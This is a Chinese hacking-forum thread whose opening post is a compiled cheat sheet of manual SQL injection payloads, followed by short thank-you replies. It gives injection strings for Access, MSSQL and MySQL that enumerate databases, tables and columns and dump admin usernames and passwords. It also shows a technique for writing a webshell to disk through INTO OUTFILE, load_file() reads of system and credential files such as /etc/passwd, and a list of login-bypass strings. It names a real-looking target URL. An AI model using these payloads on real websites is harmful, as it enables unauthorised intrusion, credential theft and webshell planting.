查看: 6322|回复: 23
打印 上一主题 下一主题

[注入漏洞查找] 常见的sql手工注入结合,并且写出了一些有问题的地方

[复制链接]
  • TA的每日心情
    擦汗
    2019-6-20 13:10
  • 签到天数: 116 天

    [LV.6]常住居民II

    跳转到指定楼层
    1#
    发表于 2018-2-21 02:44:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    大家好,我是星辰燎原。
    ? ? ? ? 我知道大家都熟悉sql注入漏洞,并且也不在多说什么原理了,毕竟搞安全的那嘎达都知道这个大名鼎鼎的漏洞 哈!
    ? ? ? ? 我利用了一个下午的时间,把常用的sql手工注入整合了一下,其实这些东西百度也可以出来,但是我怕有些人想我原来一样很懒的? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 嘻嘻!

    ? ? ? ? 好了,废话不多说了。
    ? ? ? ?
    ? ? ? ? 测试:access数据库注入
    http://www.spxxser.com/corporate_a.asp?id=4 and user >0 出现Microsoft JET Database Engine 错误 '80040e10' 为access数据库

    url后加入'? ?and 1=1 ? ? ? ? ? ? ? ? and 1=2

    and exists(select * from admin)? ?? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? //判断数据库为admin
    and exists(select admin from admin)? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? //判断admin数据库有无admin表
    and exists (select password from admin)? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? //判断admin数据库中有无password表
    and exitst (select top 1 len(admin)from admin)>1? ? ? ? ? ? ? ? ? ? ? ? //猜测字段长度
    and exists (select top 1 asc(mid(admin,1,1))from admin)>97? ? ? ? ? ? ? ? //猜解第一条记录的第一位字符的ASCII码为97


    手工联合查询:
    order by 数字? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? //判断长度为*
    union select 1,2,3,4,5 ***??from admin(表)? ?(长度为多少写多少)??? ? ? ? //联合查询
    页面显示2和3??union select 1,admin,password,4,5,6,**? ?? ? ? ? ? ? ? ? ? ? ? ? //暴出用户名和密码

    ?id=1513 union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,15,password,17,18,19,20,21,22,23,24,25,26 from [D:/1.mdb].表名 垮库



    mssql (ps:mssql就是sql server,以前傻傻的我还以为mssql是什么鬼呢,很可笑是不是)
    ? ? ? ?
    Sysobjects:SQL-SERVER的每个数据库内都有此系统表,它存放该数据库内创建的

    所有对象,如约束、默认值、日志、规则、存储过程等,每个对象在表中占一行。
    对象类型(xtype)。可以是下列对象类型中的一种:
    C = CHECK 约束
    D = 默认值或 DEFAULT 约束
    F = FOREIGN KEY 约束
    L = 日志
    FN = 标量函数
    IF = 内嵌表函数
    P = 存储过程
    PK = PRIMARY KEY 约束(类型是 K)
    RF = 复制筛选存储过程
    S = 系统表
    TF = 表函数
    TR = 触发器
    U = 用户表
    UQ = UNIQUE 约束(类型是 K)
    V = 视图
    X = 扩展存储过程
    当xtype='U' and status>0代表是用户建立的表,对象名就是表名,对象ID就是表

    master.dbo.sysdatabases指的是在Master数据库里有一个sysdatabases表,这个表里存的这台服务器上是所有数据库的信息。





    and exists(select * from sysobjects) //判断是否是MSSQL

    获取第一个数据库库名:
    and 1=(select top 1 name from master..sysdatabases where dbid>4)

    获取第二个数据库库名:
    and 1=(select top 1 name from master..sysdatabases where dbid>4 and name <> '第一个数据库库名')

    获取第一个当前使用的数据库表名:
    and 1=(select top 1 name from sysobjects where xtype='u')

    获取第二个当前使用的数据库表名:
    and 1=(select top 1 name
    from sysobjects where xtype='u’ and name <> '第一个数据库表名')

    获取第一个当前使用的数据库中的表(users)中的列名:
    and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users'))

    获取第二个当前使用的数据库中的表(users)中的列名:
    and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name='users') and name <> '第一个列名')

    获取第一个当前使用的数据库中的表(users)中的列(uname)的字段:
    简单理解:获取用户名
    and 1=(select top 1 uname from users)

    获取第一个当前使用的数据库中的表(users)中的列(upass)的字段:
    简单理解:获取密码
    and 1=(select top 1 upass from users)



    mysql数据库注入:
    1.system_user() 系统用户名
    2.user() 用户名
    3.current_user() 当前用户名
    4.session_user() 链接数据库的用户名
    5.database() 数据库库名
    6.version() mysql数据库版本信息
    7.load_file() 转换成16或10进制 读取本地文件
    8.@@datadir 读取数据库路径
    9.@@basedir MYSQL安装路径
    10.@@version_compile_os 操作系统




    字段长度

    Order by num/*


    匹配字段

    and 1=1 union select 1,2,3,4,5…….n/*


    暴字段位置

    and 1=2 union select 1,2,3,4,5…..n/*


    利用内置函数暴数据库信息

    version() database() user()

    不用猜解可用字段暴数据库信息(有些网站不适用):

    and 1=2 union all select version() /*

    and 1=2 union all select database() /*

    and 1=2 union all select user() /*

    操作系统信息:

    and 1=2 union all select @@global.version_compile_os from mysql.user /*

    数据库权限:

    and ord(mid(user(),1,1))=114 /* 返回正常说明为root


    暴库 (mysql>5.0)

    Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息

    and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1


    猜表

    and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—


    猜字段

    and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1


    暴密码

    and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1

    高级用法(一个可用字段显示两个数据内容):

    Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1


    直接写马(Root权限)

    条件:1、知道站点物理路径

    2、有足够大的权限(可以用select …. from mysql.user测试)

    3、magic_quotes_gpc()=OFF

    select ‘' into outfile ‘物理路径'

    and 1=2 union all select 一句话HEX值 into outfile '路径'


    load_file() 常用路径:

    ? ? 1、replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
    ? ? 2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
    ? ? 上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
    ? ? 3、load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
    ? ? 4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
    ? ? 5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系统apache文件
    ? ? 6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
    ? ? 7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
    ? ? 8、d:\APACHE\Apache2\conf\httpd.conf
    ? ? 9、C:\Program Files\mysql\my.ini
    ? ? 10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
    ? ? 11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件
    ? ? 12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
    ? ? 13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
    ? ? 14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
    ? ? 15、 /etc/sysconfig/iptables 本看防火墙策略
    ? ? 16 、usr/local/app/php5 b/php.ini PHP 的相当设置
    ? ? 17 、/etc/my.cnf MYSQL的配置文件
    ? ? 18、 /etc/redhat-release 红帽子的系统版本
    ? ? 19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
    ? ? 20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
    ? ? 21、/usr/local/app/php5 b/php.ini //PHP相关设置
    ? ? 22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
    ? ? 23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
    ? ? 24、c:\windows\my.ini
    ? ? 25、c:\boot.ini

    网站常用配置文件

    config.inc.php、config.php。load_file()时要用replace(load_file(HEX),char(60),char(32))


    post万能密码注入:

    asp aspx万能密码
    1:"or "a"="a

    2: ')or('a'='a

    3:or 1=1--

    4:'or 1=1--

    5:a'or' 1=1--

    6:"or 1=1--

    7:'or'a'='a

    8:"or"="a'='a

    9:'or''='

    10:'or'='or'

    11:1 or '1'='1'=1

    12:1 or '1'='1' or 1=1

    13: 'OR 1=1%00

    14: "or 1=1%00

    15:'xor

    16: 用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)

    密码 1

    17..admin' or 'a'='a 密码随便

    PHP万能密码

    'or 1=1/*

    User: something

    Pass: ' or '1'='1

    jsp 万能密码


    1'or'1'='1


    admin' or 1=1/*

    ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 我不是原创,我只是在资料的前提下,整合了一些内容,谢谢大家给我面子用几秒钟时间观看,
    ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ps:不喜欢请勿骂
    ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? by??HUC星辰燎原
    ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?


    ? ? ? ?
  • TA的每日心情
    开心
    2018-10-1 21:26
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    推荐
    发表于 2018-3-2 13:56:20 | 只看该作者
    膜拜大佬,菜鸟我还在入门中。。。很想学会
  • TA的每日心情
    擦汗
    2019-7-17 00:10
  • 签到天数: 110 天

    [LV.6]常住居民II

    3#
    发表于 2018-3-8 00:52:31 来自手机 | 只看该作者
    老铁很不错 希望下次直接发视频出来
  • TA的每日心情
    开心
    2018-3-12 11:44
  • 签到天数: 6 天

    [LV.2]偶尔看看I

    4#
    发表于 2018-3-8 09:17:00 | 只看该作者
    学习,谢谢楼主整理
  • TA的每日心情
    难过
    前天?22:32
  • 签到天数: 59 天

    [LV.5]常住居民I

    5#
    发表于 2018-3-9 10:02:16 来自手机 | 只看该作者
    大佬辛苦了!努力学习中
  • TA的每日心情
    慵懒
    2019-7-23 16:05
  • 签到天数: 53 天

    [LV.5]常住居民I

    6#
    发表于 2018-3-25 19:33:35 来自手机 | 只看该作者
    辛苦了楼主
  • TA的每日心情
    慵懒
    2018-3-28 12:40
  • 签到天数: 55 天

    [LV.5]常住居民I

    7#
    发表于 2018-3-28 15:08:27 | 只看该作者
    好水啊,我也想水一下
  • TA的每日心情
    开心
    2018-4-23 11:08
  • 签到天数: 8 天

    [LV.3]偶尔看看II

    8#
    发表于 2018-3-28 16:08:07 | 只看该作者
    谢谢楼主,新人学习中
  • TA的每日心情
    奋斗
    2018-8-6 18:15
  • 签到天数: 119 天

    [LV.6]常住居民II

    9#
    发表于 2018-3-29 17:41:56 | 只看该作者
    楼主辛苦了??这个非常不错
  • TA的每日心情
    奋斗
    2019-2-15 15:56
  • 签到天数: 21 天

    [LV.4]偶尔看看III

    10#
    发表于 2018-6-26 22:59:14 | 只看该作者
    很有启发,感谢大佬
  • TA的每日心情

    5?天前
  • 签到天数: 212 天

    [LV.7]常住居民III

    11#
    发表于 2018-6-27 11:28:23 | 只看该作者
    感谢楼主的分享
  • TA的每日心情
    擦汗
    2018-7-21 00:34
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    12#
    发表于 2018-7-13 13:47:17 | 只看该作者
    太深奥了不懂
  • TA的每日心情

    2019-7-25 17:02
  • 签到天数: 61 天

    [LV.6]常住居民II

    13#
    发表于 2018-7-15 19:56:44 | 只看该作者
    感谢楼主的分享
  • TA的每日心情
    奋斗
    2018-8-3 09:55
  • 签到天数: 6 天

    [LV.2]偶尔看看I

    15#
    发表于 2018-7-28 14:34:39 | 只看该作者
    大佬辛苦了!努力学习中
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    关闭

    站长推荐 上一条 /1 下一条

    红盟社区--中国亚博亚洲平台联盟?

    Processed in 0.099155 second(s), 30 queries.

    站点统计| 举报| Archiver| 手机版| 黑屋 | ??

    Powered by HUC ? 2001-2017 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表